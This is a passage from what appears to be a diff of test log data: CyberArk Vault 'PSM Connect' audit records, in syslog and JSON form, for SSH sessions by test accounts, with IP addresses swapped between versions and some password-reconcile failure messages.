Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM 